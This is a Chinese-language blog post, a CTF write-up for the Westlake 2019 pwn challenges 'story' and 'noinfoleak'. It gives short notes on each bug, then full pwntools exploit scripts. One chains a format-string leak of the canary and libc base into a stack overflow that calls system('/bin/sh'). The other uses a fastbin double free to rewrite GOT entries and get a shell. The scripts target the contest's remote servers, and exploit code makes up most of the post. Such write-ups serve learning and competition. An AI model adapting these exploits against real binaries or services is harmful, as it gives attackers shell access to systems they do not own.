Westlake_2019

西湖论剑 2019

start

感觉省外竞争好激烈…省内混进决赛感觉很惭愧…
最后题pwn没做出来..还是自己太菜了#单独和0ctf的storm一起写篇
前两题pwn比较简单.

story

binary
第一个是fmtstr的漏洞第二个是溢出漏洞.
合起来简单用法就是fmtstr泄露canary和libc
溢出跳one_gadge或者system

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *
context.log_level='debug'
#p=process("./story")
p=remote("ctf2.linkedbyx.com",10525)
#gdb.attach(p,'b printf')
p.sendlineafter("ID:","%23$p|%25$p")
p.readuntil("ello ")
canary=int(p.readuntil("|")[:-1],16)
base=int(p.readline()[:-1],16)-(0x7ffff7a2d830-0x7ffff7a0d000)
log.warning(hex(canary))
log.warning(hex(base))
p.sendlineafter("story:\n",str(1024))
one=0x3ac5c
libc=ELF("./story").libc
libc.address=base
p.sendlineafter("story:\n","A"*0x88+p64(canary)*2+p64(0x0000000000400bd3)+p64(libc.search("/bin/sh").next())+p64(libc.symbols['system']))
p.interactive()

noinfoleak

binary
好像就是没有show但是double_free
double_free控制到bss上的list对free的got改写为puts的plt
之后泄露地址,然后改写atoi的got为system

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
from pwn import *
def cmd(c):
p.sendlineafter(">",str(c))
def add(size,c):
cmd(1)
cmd(size)
p.sendlineafter(">",c)
def free(idx):
cmd(2)
cmd(idx)
def edit(idx,c):
cmd(3)
cmd(idx)
p.sendafter(">",c)
#p=process("./noinfoleak")
p=remote("ctf2.linkedbyx.com",10856)
got=0x000000000601018
puts=0x4006b0
context.log_level='debug'
add(0x67,"A")#0
add(0x67,"A")#1
free(0)
free(1)
free(0)
add(0x67,p64(0x60108d))
add(0x67,"A")
add(0x67,"A")
add(0x67,"\x00"*3+p64(got)+p64(0x20)+p64(0x000000000601020)+p64(0x20)+p64(0x000000000601068)+'\xaa')
edit(0,p64(0x4006b0)[:-1])
free(1)
base=u64(p.readline()[:-1].ljust(8,'\x00'))-(0x7ffff7a7e290-0x7ffff7a0d000)
libc=ELF("./noinfoleak").libc
libc.address=base
log.info(hex(base))
edit(2,p64(libc.symbols['system']))
cmd("/bin/sh")
#gdb.attach(p)


p.interactive()
Author: n132!
Link: https://n132.github.io/2019/04/10/2019-04-10-Westlake-2019/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.